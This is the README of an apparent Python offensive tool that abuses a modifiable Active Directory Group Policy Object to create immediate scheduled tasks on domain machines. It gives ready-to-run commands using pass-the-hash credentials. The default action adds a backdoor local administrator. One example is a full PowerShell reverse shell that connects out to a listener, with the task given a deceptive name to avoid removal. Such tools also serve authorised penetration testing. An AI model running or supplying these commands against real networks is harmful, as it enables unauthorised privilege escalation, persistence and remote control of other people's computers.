Python partial implementation of SharpGPOAbuse by@pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
Add john user to local administrators group (Password: H4x00r123..)
python3.8 pygpoabuse.py domain.com/username@pdc.domain.com -gpo-id "17DF9AB4-2AAF-4E60-BF0C-75746436C80F" -f -vv -hashes 8BFD10F0484F52314831296E66EF7C51:8BFD10F0484F52314831296E66EF7C51 -dc_ip_or_fqdn pdc.domain.com+Call whoami... but you won't see it anyway )
python3.8 pygpoabuse.py domain.com/username@pdc.domain.com -gpo-id "17DF9AB4-2AAF-4E60-BF0C-75746436C80F" -f -vv -hashes 8BFD10F0484F52314831296E66EF7C51:8BFD10F0484F52314831296E66EF7C51 -dc_ip_or_fqdn pdc.domain.com -command 'whoami'+Give custom task name
python3.8 pygpoabuse.py domain.com/username@pdc.domain.com -gpo-id "17DF9AB4-2AAF-4E60-BF0C-75746436C80F" -f -vv -hashes 8BFD10F0484F52314831296E66EF7C51:8BFD10F0484F52314831296E66EF7C51 -dc_ip_or_fqdn pdc.domain.com -command 'whoami' -taskname RastaDoNotTouch+Using password instead of hash. Well you will be prompted for it
python3.8 pygpoabuse.py domain.com/username@pdc.domain.com -gpo-id "17DF9AB4-2AAF-4E60-BF0C-75746436C80F" -f -vv -dc_ip_or_fqdn pdc.domain.com -command 'whoami' -taskname RastaDoNotTouch
Password: *****************note It is important to install msldap > 0.3.38
pip install msldap
Otherwise you will receive errors like:
[x] An error occurred. Use -vv for more details
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/msldap/commons/url.py", line 119, in scheme_decoder
...
ValueError: 'NTLM-NT' is not a valid LDAPAuthProtocol
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "pygpoabuse.py", line 133, in <module>
...
File "/usr/local/lib/python3.8/dist-packages/msldap/commons/url.py", line 121, in scheme_decoder
raise Exception('Uknown scheme!')
Exception: Uknown scheme!
If GPO applied to users, not computers then default runAs parameter which is equal to runAs="NT AUTHORITY\System" won't work, as user has no permissions.
Eventhough it is not documented you can try two options:
- Create a task, repeat a task with a different name. Second task will have runAs="%LogonDomain%%LogonUser%" which should work just fine
- Create a task, repeat a task with a different name. If runAs in the second task still equal to "NT AUTHORITY\System" then change it manuall to "%LogonDomain%%LogonUser%".
Reverse shell example
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \
-powershell \
-command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \
-taskname "Completely Legit Task" \
-description "Dis is legit, pliz no delete" \
-user- @pkb1s for SharpGPOAbuse
- @airman604 for schtask_now.py
- @SkelSec for msldap
wget https://github.com/skelsec/minikerberos/archive/refs/tags/0.2.18.zip
unzip 0.2.18.zip
cd minikerberos-0.2.18
python3 setup.py install
wget https://github.com/skelsec/msldap/archive/refs/tags/0.3.29.zip
cd msldap-0.3.29
unzip 0.3.29.zip
python3 setup.py install